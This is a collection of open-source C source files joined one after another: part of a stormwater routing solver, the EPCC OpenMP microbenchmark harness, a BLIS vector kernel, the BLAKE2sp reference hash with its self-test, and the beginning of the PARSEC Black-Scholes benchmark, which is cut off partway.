yNew = yOld + dy;
// --- save non-ponded surface area for use in surcharge algorithm //(5.1.002)
if ( !isPonded ) Xnode[i].oldSurfArea = surfArea; //(5.1.002)
// --- apply under-relaxation to new depth estimate
if ( Steps > 0 )
{
yNew = (1.0 - Omega) * yLast + Omega * yNew;
}
// --- don't allow a ponded node to drop much below full depth
if ( isPonded && yNew < Node[i].fullDepth )
yNew = Node[i].fullDepth - FUDGE;
}
// --- if node surcharged, base depth change on dqdh
// NOTE: depth change is w.r.t depth from previous
// iteration; also, do not apply under-relaxation.
else
{
// --- apply correction factor for upstream terminal nodes
corr = 1.0;
if ( Node[i].degree < 0 ) corr = 0.6;
// --- allow surface area from last non-surcharged condition
// to influence dqdh if depth close to crown depth
denom = Xnode[i].sumdqdh;
if ( yLast < 1.25 * yCrown )
{
f = (yLast - yCrown) / yCrown;
denom += (Xnode[i].oldSurfArea/dt -
Xnode[i].sumdqdh) * exp(-15.0 * f);
}
// --- compute new estimate of node depth
if ( denom == 0.0 ) dy = 0.0;
else dy = corr * dQ / denom;
yNew = yLast + dy;
if ( yNew < yCrown ) yNew = yCrown - FUDGE;
// --- don't allow a newly ponded node to rise much above full depth
if ( canPond && yNew > Node[i].fullDepth )
yNew = Node[i].fullDepth + FUDGE;
}
// --- depth cannot be negative
if ( yNew < 0 ) yNew = 0.0;
// --- determine max. non-flooded depth
yMax = Node[i].fullDepth;
if ( canPond == FALSE ) yMax += Node[i].surDepth;
// --- find flooded depth & volume
if ( yNew > yMax )
{
yNew = getFloodedDepth(i, canPond, dV, yNew, yMax, dt);
}
else Node[i].newVolume = node_getVolume(i, yNew);
// --- compute change in depth w.r.t. time
Xnode[i].dYdT = fabs(yNew - yOld) / dt;
// --- save new depth for node
Node[i].newDepth = yNew;
}
//=============================================================================
double getFloodedDepth(int i, int canPond, double dV, double yNew,
double yMax, double dt)
//
// Input: i = node index
// canPond = TRUE if water can pond over node
// isPonded = TRUE if water is currently ponded
// dV = change in volume over time step (ft3)
// yNew = current depth at node (ft)
// yMax = max. depth at node before ponding (ft)
// dt = time step (sec)
// Output: returns depth at node when flooded (ft)
// Purpose: computes depth, volume and overflow for a flooded node.
//
{
if ( canPond == FALSE )
{
Node[i].overflow = dV / dt;
Node[i].newVolume = Node[i].fullVolume;
yNew = yMax;
}
else
{
Node[i].newVolume = MAX((Node[i].oldVolume+dV), Node[i].fullVolume);
Node[i].overflow = (Node[i].newVolume -
MAX(Node[i].oldVolume, Node[i].fullVolume)) / dt;
}
if ( Node[i].overflow < FUDGE ) Node[i].overflow = 0.0;
return yNew;
}
//=============================================================================
double getVariableStep(double maxStep)
//
// Input: maxStep = user-supplied max. time step (sec)
// Output: returns time step (sec)
// Purpose: finds time step that satisfies stability criterion but
// is no greater than the user-supplied max. time step.
//
{
int minLink = -1; // index of link w/ min. time step
int minNode = -1; // index of node w/ min. time step
double tMin; // allowable time step (sec)
double tMinLink; // allowable time step for links (sec)
double tMinNode; // allowable time step for nodes (sec)
// --- find stable time step for links & then nodes
tMin = maxStep;
tMinLink = getLinkStep(tMin, &minLink);
tMinNode = getNodeStep(tMinLink, &minNode);
// --- use smaller of the link and node time step
tMin = tMinLink;
if ( tMinNode < tMin )
{
tMin = tMinNode ;
minLink = -1;
}
// --- update count of times the minimum node or link was critical
stats_updateCriticalTimeCount(minNode, minLink);
// --- don't let time step go below an absolute minimum
if ( tMin < MinRouteStep ) tMin = MinRouteStep; //(5.1.008)
return tMin;
}
//=============================================================================
double getLinkStep(double tMin, int *minLink)
//
// Input: tMin = critical time step found so far (sec)
// Output: minLink = index of link with critical time step;
// returns critical time step (sec)
// Purpose: finds critical time step for conduits based on Courant criterion.
//
{
int i; // link index
int k; // conduit index
double q; // conduit flow (cfs)
double t; // time step (sec)
double tLink = tMin; // critical link time step (sec)
// --- examine each conduit link
for ( i = 0; i < Nobjects[LINK]; i++ )
{
if ( Link[i].type == CONDUIT )
{
// --- skip conduits with negligible flow, area or Fr
k = Link[i].subIndex;
q = fabs(Link[i].newFlow) / Conduit[k].barrels;
if ( q <= 0.05 * Link[i].qFull
|| Conduit[k].a1 <= FUDGE
|| Link[i].froude <= 0.01
) continue;
// --- compute time step to satisfy Courant condition
t = Link[i].newVolume / Conduit[k].barrels / q;
t = t * Conduit[k].modLength / link_getLength(i);
t = t * Link[i].froude / (1.0 + Link[i].froude) * CourantFactor;
// --- update critical link time step
if ( t < tLink )
{
tLink = t;
*minLink = i;
}
}
}
return tLink;
}
//=============================================================================
double getNodeStep(double tMin, int *minNode)
//
// Input: tMin = critical time step found so far (sec)
// Output: minNode = index of node with critical time step;
// returns critical time step (sec)
// Purpose: finds critical time step for nodes based on max. allowable
// projected change in depth.
//
{
int i; // node index
double maxDepth; // max. depth allowed at node (ft)
double dYdT; // change in depth per unit time (ft/sec)
double t1; // time needed to reach depth limit (sec)
double tNode = tMin; // critical node time step (sec)
// --- find smallest time so that estimated change in nodal depth
// does not exceed safety factor * maxdepth
for ( i = 0; i < Nobjects[NODE]; i++ )
{
// --- see if node can be skipped
if ( Node[i].type == OUTFALL ) continue;
if ( Node[i].newDepth <= FUDGE) continue;
if ( Node[i].newDepth + FUDGE >=
Node[i].crownElev - Node[i].invertElev ) continue;
// --- define max. allowable depth change using crown elevation
maxDepth = (Node[i].crownElev - Node[i].invertElev) * 0.25;
if ( maxDepth < FUDGE ) continue;
dYdT = Xnode[i].dYdT;
if (dYdT < FUDGE ) continue;
// --- compute time to reach max. depth & compare with critical time
t1 = maxDepth / dYdT;
if ( t1 < tNode )
{
tNode = t1;
*minNode = i;
}
}
return tNode;
}
|
common.c | /****************************************************************************
* *
* OpenMP MicroBenchmark Suite - Version 3.1 *
* *
* produced by *
* *
* Mark Bull, Fiona Reid and Nix Mc Donnell *
* *
* at *
* *
* Edinburgh Parallel Computing Centre *
* *
* email: markb@epcc.ed.ac.uk or fiona@epcc.ed.ac.uk *
* *
* *
* This version copyright (c) The University of Edinburgh, 2015. *
* *
* *
* Licensed under the Apache License, Version 2.0 (the "License"); *
* you may not use this file except in compliance with the License. *
* You may obtain a copy of the License at *
* *
* http://www.apache.org/licenses/LICENSE-2.0 *
* *
* Unless required by applicable law or agreed to in writing, software *
* distributed under the License is distributed on an "AS IS" BASIS, *
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. *
* See the License for the specific language governing permissions and *
* limitations under the License. *
* *
****************************************************************************/
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
#include <math.h>
#include <omp.h>
#include <xray.h>
#include "common.h"
#define CONF95 1.96
int nthreads = -1; // Number of OpenMP threads
int delaylength = -1; // The number of iterations to delay for
int outerreps = -1; // Outer repetitions
double delaytime = -1.0; // Length of time to delay for in microseconds
double targettesttime = 0.0; // The length of time in microseconds that the test
// should run for.
unsigned long innerreps; // Inner repetitions
double *times; // Array of doubles storing the benchmark times in microseconds
double referencetime; // The average reference time in microseconds to perform
// outerreps runs
double referencesd; // The standard deviation in the reference time in
// microseconds for outerreps runs.
double testtime; // The average test time in microseconds for
// outerreps runs
double testsd; // The standard deviation in the test time in
// microseconds for outerreps runs.
void usage(char *argv[]) {
printf("Usage: %s.x \n"
"\t--outer-repetitions <outer-repetitions> (default %d)\n"
"\t--test-time <target-test-time> (default %0.2f microseconds)\n"
"\t--delay-time <delay-time> (default %0.4f microseconds)\n"
"\t--delay-length <delay-length> "
"(default auto-generated based on processor speed)\n",
argv[0],
DEFAULT_OUTER_REPS, DEFAULT_TEST_TARGET_TIME, DEFAULT_DELAY_TIME);
}
void parse_args(int argc, char *argv[]) {
// Parse the parameters
int arg;
for (arg = 1; arg < argc; arg++) {
if (strcmp(argv[arg], "--delay-time") == 0.0) {
delaytime = atof(argv[++arg]);
if (delaytime == 0.0) {
printf("Invalid float:--delay-time: %s\n", argv[arg]);
usage(argv);
exit(EXIT_FAILURE);
}
} else if (strcmp(argv[arg], "--outer-repetitions") == 0) {
outerreps = atoi(argv[++arg]);
if (outerreps == 0) {
printf("Invalid integer:--outer-repetitions: %s\n", argv[arg]);
usage(argv);
exit(EXIT_FAILURE);
}
} else if (strcmp(argv[arg], "--test-time") == 0) {
targettesttime = atof(argv[++arg]);
if (targettesttime == 0) {
printf("Invalid integer:--test-time: %s\n", argv[arg]);
usage(argv);
exit(EXIT_FAILURE);
}
} else if (strcmp(argv[arg], "-h") == 0) {
usage(argv);
exit(EXIT_SUCCESS);
} else {
printf("Invalid parameters: %s\n", argv[arg]);
usage(argv);
exit(EXIT_FAILURE);
}
}
}
int getdelaylengthfromtime(double delaytime) {
int i, reps;
double lapsedtime, starttime; // seconds
reps = 1000;
lapsedtime = 0.0;
delaytime = delaytime/1.0E6; // convert from microseconds to seconds
// Note: delaytime is local to this function and thus the conversion
// does not propagate to the main code.
// Here we want to use the delaytime in microseconds to find the
// delaylength in iterations. We start with delaylength=0 and
// increase until we get a large enough delaytime, return delaylength
// in iterations.
delaylength = 0;
delay(delaylength);
while (lapsedtime < delaytime) {
delaylength = delaylength * 1.1 + 1;
starttime = getclock();
for (i = 0; i < reps; i++) {
delay(delaylength);
}
lapsedtime = (getclock() - starttime) / (double) reps;
}
return delaylength;
}
unsigned long getinnerreps(void (*test)(void)) {
innerreps = 10L; // some initial value
double time = 0.0;
while (time < targettesttime) {
double start = getclock();
test();
time = (getclock() - start) * 1.0e6;
innerreps *=2;
// Test to stop code if compiler is optimising reference time expressions away
if (innerreps > (targettesttime*1.0e15)) {
printf("Compiler has optimised reference loop away, STOP! \n");
printf("Try recompiling with lower optimisation level \n");
exit(1);
}
}
return innerreps;
}
void printheader(char *name) {
printf("\n");
printf("--------------------------------------------------------\n");
printf("Computing %s time using %lu reps\n", name, innerreps);
}
void stats(double *mtp, double *sdp) {
double meantime, totaltime, sumsq, mintime, maxtime, sd, cutoff;
int i, nr;
mintime = 1.0e10;
maxtime = 0.;
totaltime = 0.;
for (i = 1; i <= outerreps; i++) {
mintime = (mintime < times[i]) ? mintime : times[i];
maxtime = (maxtime > times[i]) ? maxtime : times[i];
totaltime += times[i];
}
meantime = totaltime / outerreps;
sumsq = 0;
for (i = 1; i <= outerreps; i++) {
sumsq += (times[i] - meantime) * (times[i] - meantime);
}
sd = sqrt(sumsq / (outerreps - 1));
cutoff = 3.0 * sd;
nr = 0;
for (i = 1; i <= outerreps; i++) {
if (fabs(times[i] - meantime) > cutoff)
nr++;
}
printf("\n");
printf("Sample_size Average Min Max S.D. Outliers\n");
printf(" %d %f %f %f %f %d\n",
outerreps, meantime, mintime, maxtime, sd, nr);
printf("\n");
*mtp = meantime;
*sdp = sd;
}
void printfooter(char *name, double testtime, double testsd,
double referencetime, double refsd) {
printf("%s time = %f microseconds +/- %f\n",
name, testtime, CONF95*testsd);
printf("%s overhead = %f microseconds +/- %f\n",
name, testtime-referencetime, CONF95*(testsd+referencesd));
}
void printreferencefooter(char *name, double referencetime, double referencesd) {
printf("%s time = %f microseconds +/- %f\n",
name, referencetime, CONF95 * referencesd);
}
void init(int argc, char **argv)
{
#pragma omp parallel
{
#pragma omp master
{
nthreads = omp_get_num_threads();
}
}
parse_args(argc, argv);
if (outerreps == -1) {
outerreps = DEFAULT_OUTER_REPS;
}
if (targettesttime == 0.0) {
targettesttime = DEFAULT_TEST_TARGET_TIME;
}
if (delaytime == -1.0) {
delaytime = DEFAULT_DELAY_TIME;
}
delaylength = getdelaylengthfromtime(delaytime); // Always need to compute delaylength in iterations
times = malloc((outerreps+1) * sizeof(double));
printf("Running OpenMP benchmark version 3.0\n"
"\t%d thread(s)\n"
"\t%d outer repetitions\n"
"\t%0.2f test time (microseconds)\n"
"\t%d delay length (iterations) \n"
"\t%f delay time (microseconds)\n",
nthreads,
outerreps, targettesttime,
delaylength, delaytime);
}
void finalise(void) {
free(times);
}
void initreference(char *name) {
printheader(name);
}
/* Calculate the reference time. */
void reference(char *name, void (*refer)(void)) {
int k;
double start;
XRayLabelFrame(name);
// Calculate the required number of innerreps
innerreps = getinnerreps(refer);
initreference(name);
for (k = 0; k <= outerreps; k++) {
start = getclock();
refer();
times[k] = (getclock() - start) * 1.0e6 / (double) innerreps;
}
finalisereference(name);
}
void finalisereference(char *name) {
stats(&referencetime, &referencesd);
printreferencefooter(name, referencetime, referencesd);
}
void intitest(char *name) {
printheader(name);
}
void finalisetest(char *name) {
stats(&testtime, &testsd);
printfooter(name, testtime, testsd, referencetime, referencesd);
}
/* Function to run a microbenchmark test*/
void benchmark(char *name, void (*test)(void))
{
int k;
double start;
// Calculate the required number of innerreps
innerreps = getinnerreps(test);
intitest(name);
XRayLabelFrame(name);
for (k=0; k<=outerreps; k++) {
start = getclock();
test();
times[k] = (getclock() - start) * 1.0e6 / (double) innerreps;
}
finalisetest(name);
}
// For the Cray compiler on HECToR we need to turn off optimisation
// for the delay and array_delay functions. Other compilers should
// not be afffected.
#pragma _CRI noopt
void delay(int delaylength) {
int i;
float a = 0.;
for (i = 0; i < delaylength; i++)
a += i;
if (a < 0)
printf("%f \n", a);
}
void array_delay(int delaylength, double a[1]) {
int i;
a[0] = 1.0;
for (i = 0; i < delaylength; i++)
a[0] += i;
if (a[0] < 0)
printf("%f \n", a[0]);
}
// Re-enable optimisation for remainder of source.
#pragma _CRI opt
double getclock() {
double time;
// Returns a value in seconds of the time elapsed from some arbitrary,
// but consistent point.
double omp_get_wtime(void);
time = omp_get_wtime();
return time;
}
int returnfalse() {
return 0;
}
|
bli_axpyv_bgq_int.c | /*
BLIS
An object-based framework for developing high-performance BLAS-like
libraries.
Copyright (C) 2014, The University of Texas at Austin
Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions are
met:
- Redistributions of source code must retain the above copyright
notice, this list of conditions and the following disclaimer.
- Redistributions in binary form must reproduce the above copyright
notice, this list of conditions and the following disclaimer in the
documentation and/or other materials provided with the distribution.
- Neither the name(s) of the copyright holder(s) nor the names of its
contributors may be used to endorse or promote products derived
from this software without specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
"AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
(INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
*/
#include "blis.h"
void bli_daxpyv_bgq_int
(
conj_t conjx,
dim_t n,
double* restrict alpha,
double* restrict x, inc_t incx,
double* restrict y, inc_t incy,
cntx_t* restrict cntx
)
{
if ( bli_zero_dim1( n ) ) return;
// If there is anything that would interfere with our use of aligned
// vector loads/stores, call the reference implementation.
bool use_ref = FALSE;
if ( incx != 1 || incy != 1 || bli_is_unaligned_to( ( siz_t )x, 32 ) || bli_is_unaligned_to( ( siz_t )y, 32 ) ) {
use_ref = TRUE;
}
// Call the reference implementation if needed.
if ( use_ref == TRUE ) {
BLIS_DAXPYV_KERNEL_REF( conjx, n, alpha, x, incx, y, incy, cntx );
return;
}
dim_t n_run = n / 4;
dim_t n_left = n % 4;
vector4double xv, yv, zv;
vector4double alphav = vec_lds( 0 * sizeof(double), (double*)alpha );
#pragma omp parallel for
for ( dim_t i = 0; i < n_run; i++ )
{
xv = vec_lda( 0 * sizeof(double), &x[i*4] );
yv = vec_lda( 0 * sizeof(double), &y[i*4] );
zv = vec_madd( alphav, xv, yv );
vec_sta( zv, 0 * sizeof(double), &y[i*4] );
}
for ( dim_t i = 0; i < n_left; i++ )
{
y[4*n_run + i] += *alpha * x[4*n_run + i];
}
}
|
blake2sp-ref.c | /*
BLAKE2 reference source code package - reference C implementations
Copyright 2012, Samuel Neves <sneves@dei.uc.pt>. You may use this under the
terms of the CC0, the OpenSSL Licence, or the Apache Public License 2.0, at
your option. The terms of these licenses can be found at:
- CC0 1.0 Universal : http://creativecommons.org/publicdomain/zero/1.0
- OpenSSL license : https://www.openssl.org/source/license.html
- Apache 2.0 : http://www.apache.org/licenses/LICENSE-2.0
More information about the BLAKE2 hash function can be found at
https://blake2.net.
*/
#include <stdlib.h>
#include <string.h>
#include <stdio.h>
#if defined(_OPENMP)
#include <omp.h>
#endif
#include "blake2.h"
#include "blake2-impl.h"
#define PARALLELISM_DEGREE 8
static int blake2sp_init_leaf( blake2s_state *S, size_t outlen, size_t keylen, uint64_t offset )
{
blake2s_param P[1];
P->digest_length = (uint8_t)outlen;
P->key_length = (uint8_t)keylen;
P->fanout = PARALLELISM_DEGREE;
P->depth = 2;
store32( &P->leaf_length, 0 );
store32( &P->node_offset, offset );
store16( &P->xof_length, 0 );
P->node_depth = 0;
P->inner_length = BLAKE2S_OUTBYTES;
memset( P->salt, 0, sizeof( P->salt ) );
memset( P->personal, 0, sizeof( P->personal ) );
return blake2s_init_param( S, P );
}
static int blake2sp_init_root( blake2s_state *S, size_t outlen, size_t keylen )
{
blake2s_param P[1];
P->digest_length = (uint8_t)outlen;
P->key_length = (uint8_t)keylen;
P->fanout = PARALLELISM_DEGREE;
P->depth = 2;
store32( &P->leaf_length, 0 );
store32( &P->node_offset, 0 );
store16( &P->xof_length, 0 );
P->node_depth = 1;
P->inner_length = BLAKE2S_OUTBYTES;
memset( P->salt, 0, sizeof( P->salt ) );
memset( P->personal, 0, sizeof( P->personal ) );
return blake2s_init_param( S, P );
}
int blake2sp_init( blake2sp_state *S, size_t outlen )
{
size_t i;
if( !outlen || outlen > BLAKE2S_OUTBYTES ) return -1;
memset( S->buf, 0, sizeof( S->buf ) );
S->buflen = 0;
S->outlen = outlen;
if( blake2sp_init_root( S->R, outlen, 0 ) < 0 )
return -1;
for( i = 0; i < PARALLELISM_DEGREE; ++i )
if( blake2sp_init_leaf( S->S[i], outlen, 0, i ) < 0 ) return -1;
S->R->last_node = 1;
S->S[PARALLELISM_DEGREE - 1]->last_node = 1;
return 0;
}
int blake2sp_init_key( blake2sp_state *S, size_t outlen, const void *key, size_t keylen )
{
size_t i;
if( !outlen || outlen > BLAKE2S_OUTBYTES ) return -1;
if( !key || !keylen || keylen > BLAKE2S_KEYBYTES ) return -1;
memset( S->buf, 0, sizeof( S->buf ) );
S->buflen = 0;
S->outlen = outlen;
if( blake2sp_init_root( S->R, outlen, keylen ) < 0 )
return -1;
for( i = 0; i < PARALLELISM_DEGREE; ++i )
if( blake2sp_init_leaf( S->S[i], outlen, keylen, i ) < 0 ) return -1;
S->R->last_node = 1;
S->S[PARALLELISM_DEGREE - 1]->last_node = 1;
{
uint8_t block[BLAKE2S_BLOCKBYTES];
memset( block, 0, BLAKE2S_BLOCKBYTES );
memcpy( block, key, keylen );
for( i = 0; i < PARALLELISM_DEGREE; ++i )
blake2s_update( S->S[i], block, BLAKE2S_BLOCKBYTES );
secure_zero_memory( block, BLAKE2S_BLOCKBYTES ); /* Burn the key from stack */
}
return 0;
}
int blake2sp_update( blake2sp_state *S, const void *pin, size_t inlen )
{
const unsigned char * in = (const unsigned char *)pin;
size_t left = S->buflen;
size_t fill = sizeof( S->buf ) - left;
size_t i;
if( left && inlen >= fill )
{
memcpy( S->buf + left, in, fill );
for( i = 0; i < PARALLELISM_DEGREE; ++i )
blake2s_update( S->S[i], S->buf + i * BLAKE2S_BLOCKBYTES, BLAKE2S_BLOCKBYTES );
in += fill;
inlen -= fill;
left = 0;
}
#if defined(_OPENMP)
#pragma omp parallel shared(S), num_threads(PARALLELISM_DEGREE)
#else
for( i = 0; i < PARALLELISM_DEGREE; ++i )
#endif
{
#if defined(_OPENMP)
size_t i = omp_get_thread_num();
#endif
size_t inlen__ = inlen;
const unsigned char *in__ = ( const unsigned char * )in;
in__ += i * BLAKE2S_BLOCKBYTES;
while( inlen__ >= PARALLELISM_DEGREE * BLAKE2S_BLOCKBYTES )
{
blake2s_update( S->S[i], in__, BLAKE2S_BLOCKBYTES );
in__ += PARALLELISM_DEGREE * BLAKE2S_BLOCKBYTES;
inlen__ -= PARALLELISM_DEGREE * BLAKE2S_BLOCKBYTES;
}
}
in += inlen - inlen % ( PARALLELISM_DEGREE * BLAKE2S_BLOCKBYTES );
inlen %= PARALLELISM_DEGREE * BLAKE2S_BLOCKBYTES;
if( inlen > 0 )
memcpy( S->buf + left, in, inlen );
S->buflen = left + inlen;
return 0;
}
int blake2sp_final( blake2sp_state *S, void *out, size_t outlen )
{
uint8_t hash[PARALLELISM_DEGREE][BLAKE2S_OUTBYTES];
size_t i;
if(out == NULL || outlen < S->outlen) {
return -1;
}
for( i = 0; i < PARALLELISM_DEGREE; ++i )
{
if( S->buflen > i * BLAKE2S_BLOCKBYTES )
{
size_t left = S->buflen - i * BLAKE2S_BLOCKBYTES;
if( left > BLAKE2S_BLOCKBYTES ) left = BLAKE2S_BLOCKBYTES;
blake2s_update( S->S[i], S->buf + i * BLAKE2S_BLOCKBYTES, left );
}
blake2s_final( S->S[i], hash[i], BLAKE2S_OUTBYTES );
}
for( i = 0; i < PARALLELISM_DEGREE; ++i )
blake2s_update( S->R, hash[i], BLAKE2S_OUTBYTES );
return blake2s_final( S->R, out, S->outlen );
}
int blake2sp( void *out, size_t outlen, const void *in, size_t inlen, const void *key, size_t keylen )
{
uint8_t hash[PARALLELISM_DEGREE][BLAKE2S_OUTBYTES];
blake2s_state S[PARALLELISM_DEGREE][1];
blake2s_state FS[1];
size_t i;
/* Verify parameters */
if ( NULL == in && inlen > 0 ) return -1;
if ( NULL == out ) return -1;
if ( NULL == key && keylen > 0) return -1;
if( !outlen || outlen > BLAKE2S_OUTBYTES ) return -1;
if( keylen > BLAKE2S_KEYBYTES ) return -1;
for( i = 0; i < PARALLELISM_DEGREE; ++i )
if( blake2sp_init_leaf( S[i], outlen, keylen, i ) < 0 ) return -1;
S[PARALLELISM_DEGREE - 1]->last_node = 1; /* mark last node */
if( keylen > 0 )
{
uint8_t block[BLAKE2S_BLOCKBYTES];
memset( block, 0, BLAKE2S_BLOCKBYTES );
memcpy( block, key, keylen );
for( i = 0; i < PARALLELISM_DEGREE; ++i )
blake2s_update( S[i], block, BLAKE2S_BLOCKBYTES );
secure_zero_memory( block, BLAKE2S_BLOCKBYTES ); /* Burn the key from stack */
}
#if defined(_OPENMP)
#pragma omp parallel shared(S,hash), num_threads(PARALLELISM_DEGREE)
#else
for( i = 0; i < PARALLELISM_DEGREE; ++i )
#endif
{
#if defined(_OPENMP)
size_t i = omp_get_thread_num();
#endif
size_t inlen__ = inlen;
const unsigned char *in__ = ( const unsigned char * )in;
in__ += i * BLAKE2S_BLOCKBYTES;
while( inlen__ >= PARALLELISM_DEGREE * BLAKE2S_BLOCKBYTES )
{
blake2s_update( S[i], in__, BLAKE2S_BLOCKBYTES );
in__ += PARALLELISM_DEGREE * BLAKE2S_BLOCKBYTES;
inlen__ -= PARALLELISM_DEGREE * BLAKE2S_BLOCKBYTES;
}
if( inlen__ > i * BLAKE2S_BLOCKBYTES )
{
const size_t left = inlen__ - i * BLAKE2S_BLOCKBYTES;
const size_t len = left <= BLAKE2S_BLOCKBYTES ? left : BLAKE2S_BLOCKBYTES;
blake2s_update( S[i], in__, len );
}
blake2s_final( S[i], hash[i], BLAKE2S_OUTBYTES );
}
if( blake2sp_init_root( FS, outlen, keylen ) < 0 )
return -1;
FS->last_node = 1;
for( i = 0; i < PARALLELISM_DEGREE; ++i )
blake2s_update( FS, hash[i], BLAKE2S_OUTBYTES );
return blake2s_final( FS, out, outlen );
}
#if defined(BLAKE2SP_SELFTEST)
#include <string.h>
#include "blake2-kat.h"
int main( void )
{
uint8_t key[BLAKE2S_KEYBYTES];
uint8_t buf[BLAKE2_KAT_LENGTH];
size_t i, step;
for( i = 0; i < BLAKE2S_KEYBYTES; ++i )
key[i] = ( uint8_t )i;
for( i = 0; i < BLAKE2_KAT_LENGTH; ++i )
buf[i] = ( uint8_t )i;
/* Test simple API */
for( i = 0; i < BLAKE2_KAT_LENGTH; ++i )
{
uint8_t hash[BLAKE2S_OUTBYTES];
blake2sp( hash, BLAKE2S_OUTBYTES, buf, i, key, BLAKE2S_KEYBYTES );
if( 0 != memcmp( hash, blake2sp_keyed_kat[i], BLAKE2S_OUTBYTES ) )
{
goto fail;
}
}
/* Test streaming API */
for(step = 1; step < BLAKE2S_BLOCKBYTES; ++step) {
for (i = 0; i < BLAKE2_KAT_LENGTH; ++i) {
uint8_t hash[BLAKE2S_OUTBYTES];
blake2sp_state S;
uint8_t * p = buf;
size_t mlen = i;
int err = 0;
if( (err = blake2sp_init_key(&S, BLAKE2S_OUTBYTES, key, BLAKE2S_KEYBYTES)) < 0 ) {
goto fail;
}
while (mlen >= step) {
if ( (err = blake2sp_update(&S, p, step)) < 0 ) {
goto fail;
}
mlen -= step;
p += step;
}
if ( (err = blake2sp_update(&S, p, mlen)) < 0) {
goto fail;
}
if ( (err = blake2sp_final(&S, hash, BLAKE2S_OUTBYTES)) < 0) {
goto fail;
}
if (0 != memcmp(hash, blake2sp_keyed_kat[i], BLAKE2S_OUTBYTES)) {
goto fail;
}
}
}
puts( "ok" );
return 0;
fail:
puts("error");
return -1;
}
#endif
|
blackscholes.c | // Copyright (c) 2007 Intel Corp.
// Black-Scholes
// Analytical method for calculating European Options
//
//
// Reference Source: Options, Futures, and Other Derivatives, 3rd Edition,
// Prentice
// Hall, John C. Hull,
#include <stdio.h>
#include <stdlib.h>
#include <math.h>
#include <string.h>
#ifdef ENABLE_PARSEC_HOOKS
#include <hooks.h>
#endif
#define ENABLE_THREADS 1
// Multi-threaded pthreads header
#ifdef ENABLE_THREADS
// Add the following line so that icc 9.0 is compatible with pthread lib.
#define __thread __threadp
#ifdef _XOPEN_SOURCE
#undef _XOPEN_SOURCE
#define _XOPEN_SOURCE 700
#endif
#ifndef _GNU_SOURCE
#define _GNU_SOURCE
#endif
#ifndef __USE_XOPEN2K
#define __USE_XOPEN2K
#endif
#ifndef __USE_UNIX98
#define __USE_UNIX98
#endif
#include <pthread.h>
#include <time.h>
#define MAX_THREADS 128
pthread_t _M4_threadsTable[MAX_THREADS];
int _M4_threadsTableAllocated[MAX_THREADS];
pthread_mutexattr_t _M4_normalMutexAttr;
int _M4_numThreads = MAX_THREADS;
#undef __thread
#endif
// Multi-threaded OpenMP header
#ifdef ENABLE_OPENMP
#include <omp.h>
#endif
#ifdef ENABLE_TBB
#include "tbb/blocked_range.h"
#include "tbb/parallel_for.h"
#include "tbb/task_scheduler_init.h"
#include "tbb/tick_count.h"
using namespace std;
using namespace tbb;
#endif // ENABLE_TBB
// Multi-threaded header for Windows
#ifdef WIN32
#pragma warning(disable : 4305)
#pragma warning(disable : 4244)
#include <windows.h>
#define WIN32_LEAN_AND_MEAN
#include <shellapi.h>
#endif
// Precision to use for calculations
#define fptype float
#define NUM_RUNS 3
typedef struct OptionData_ {
fptype s; // spot price
fptype strike; // strike price
fptype r; // risk-free interest rate
fptype divq; // dividend rate
fptype v; // volatility
fptype t; // time to maturity or option expiration in years
// (1yr = 1.0, 6mos = 0.5, 3mos = 0.25, ..., etc)
char OptionType; // Option type. "P"=PUT, "C"=CALL
fptype divs; // dividend vals (not used in this test)
fptype DGrefval; // DerivaGem Reference Value
} OptionData;
OptionData *data;
fptype *prices;
int numOptions;
int *otype;
fptype *sptprice;
fptype *strike;
fptype *rate;
fptype *volatility;
fptype *otime;
int numError = 0;
int nThreads;
////////////////////////////////////////////////////////////////////////////////
////////////////////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////////////
////////////////////////////////////////////////////////////////////////////////
// Cumulative Normal Distribution Function
// See Hull, Section 11.8, P.243-244
#define inv_sqrt_2xPI 0.39894228040143270286
fptype CNDF(fptype InputX) {
int sign;
fptype OutputX;
fptype xInput;
fptype xNPrimeofX;
fptype expValues;
fptype xK2;
fptype xK2_2, xK2_3;
fptype xK2_4, xK2_5;
fptype xLocal, xLocal_1;
fptype xLocal_2, xLocal_3;
// Check for negative value of InputX
if (InputX < 0.0) {
InputX = -InputX;
sign = 1;
} else
sign = 0;
xInput = InputX;
// Compute NPrimeX term common to both four & six decimal accuracy calcs
expValues = exp(-0.5f * InputX * InputX);
xNPrimeofX = expValues;
xNPrimeofX = xNPrimeofX * inv_sqrt_2xPI;
xK2 = 0.2316419 * xInput;
xK2 = 1.0 + xK2;
xK2 = 1.0 / xK2;
xK2_2 = xK2 * xK2;
xK2_3 = xK2_2 * xK2;
xK2_4 = xK2_3 * xK2;
xK2_5 = xK2_4 * xK2;
xLocal_1 = xK2 * 0.319381530;
xLocal_2 = xK2_2 * (-0.356563782);
xLocal_3 = xK2_3 * 1.781477937;
xLocal_2 = xLocal_2 + xLocal_3;
xLocal_3 = xK2_4 * (-1.821255978);
xLocal_2 = xLocal_2 + xLocal_3;
xLocal_3 = xK2_5 * 1.330274429;
xLocal_2 = xLocal_2 + xLocal_3;
xLocal_1 = xLocal_2 + xLocal_1;
xLocal = xLocal_1 * xNPrimeofX;
xLocal = 1.0 - xLocal;
OutputX = xLocal;
if (sign) {
OutputX = 1.0 - OutputX;
}
return OutputX;
}
//////////////////////////////////////////////////////////////////////////////////////
//////////////////////////////////////////////////////////////////////////////////////
